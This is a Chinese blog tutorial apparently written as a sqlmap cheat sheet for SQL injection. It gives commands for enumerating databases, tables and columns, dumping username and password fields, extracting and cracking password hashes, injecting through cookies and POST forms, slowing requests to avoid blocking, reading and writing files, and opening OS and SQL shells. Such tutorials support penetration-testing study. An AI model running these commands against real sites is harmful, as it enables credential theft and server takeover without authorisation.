• sqlmap简单流程使用


    -u “(url)”

    1、判断可注入的参数
    2、判断可以用那种SQL注入技术来注入
    3、识别出哪种数据库
    4、根据用户选择,读取哪些数据

    sqlmap支持五种不同的注入模式:

    1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
    2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
    3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
    4、联合查询注入,可以使用union的情况下的注入。
    5、堆查询注入,可以同时执行多条语句的执行时的注入。

    如果支持注入,sqlmap会显示存在什么样的注入类型
    如果知道什么卡类型数据库可以指定
    --dbms=mysql oracle mssql等
    然后查看一下是否是DBA sqlmap -u "url" --is-dba
    如果是dba权限比较大我们可以执行一些命令或者上传一下shell。

    看一下用户名
    sqlmap -u "url" --current-user

    查看一下都有什么数据库
    sqlmap -u "url" --dbs
    如果权限很大可以跨库查询

    查看一下当前使用的数据库
    sqlmap -u "url" --current-db

    查看一下这个数据库的表名
    sqlmap -u "url" -D datebase --tables
    保存用户名密码的表名可能是admin password user admin_user system manage member等

    查看一下列名
    sqlmap -u "url" -D datebase -T table --columns

    查看一下数据
    sqlmap -u "url" -D datebase -T table -C username,password --dump
    上面为简单使用

    我们可以查看一下数据库都有什么用户
    sqlmap -u "url" --users

    可以查看当前数据库用户的密码
    sqlmap -u "url" --passwords
    可以选择保存hashes数据用外部程序爆破密码
    或者选择自带字典或者别的目录的字典用sqlmap来爆破密码

    可以查看一下用户的权限(能够执行什么命令)
    sqlmap -u "url" --privileges

    查看一下数据库的架构
    sqlmap -u "url" --schema --batch --exclude-sysdbs

    -v 显示调试信息 7个级别
    0 只显示python错误以及严重的信息
    1 同时显示基本信息和警告信息 (默认)
    2 同时显示debug信息
    3 同时显示payload
    4 同时显示http请求
    5 同时显示http响应头信息
    6 同时显示http相应页面

    测试语句可以在xmlpayloads.xml中找到可以研究一下

    -m 制定url列表文件

    参数 --common-tables
    当时用--tables无法获取数据库表时,可以使用此参数
    适用于下列情况
    mysql版本低于5.0没有information_schema表
    数据库是microsoft Access 系统表MSysObjects是不可读的(默认)
    当前用户没有权限读取系统中保存数据结构的表的权限。
    暴力破解的表在/txt/common-tables.txt中,可以自己添加

    --common-columns 同上 用于列名

    cookie 注入
    sqlmap -u"cookie.sql.com/test.php" --cookie "id=11" --level 2
    url中参数加在cookie参数后面 level最少指定2
    HTTP Cookie在level为2的时候就会测试,HTTP User-Agent/Referer头在level为3的时候就会测试。

    post表单
    sqlmap -u "url" --form
    sqlmap -u "url" --date "username=123&password=123" (hackbar获取)

    请求延迟 请求过快可能被封
    --delay=5


    文件操作
    读写
    --file-read=""
    --file-write=""

    命令执行
    sql
    --sql-query="语句"
    --sql-shell 返回一个shell
    系统命令执行
    --os-cmd
    --os-shell

    --tamper 加载脚本












     
     
     
     
  • 相关阅读:
    Failed to load config "react-app" to extend from.
    An unexpected error occurred: "expected workspace package to exist for "@babel/core"".
    写一个 LRU 缓存函数(#146)
    TERSUS笔记303-06末页
    TERSUS笔记302-08每页条数逻辑
    TERSUS笔记301-显示列表处理+序号+01共几条取值+08每页条数下拉菜单值设置+02共页数计算取值
    TERSUS笔记300-增加
    TERSUS笔记118-多表增删改查完整操作
    Java多线程之二(Synchronized)
    HashMap在JDK1.7中可能出现的并发问题
  • 原文地址:https://www.cnblogs.com/wan-xiang/p/7100149.html
Copyright © 2020-2023  润新知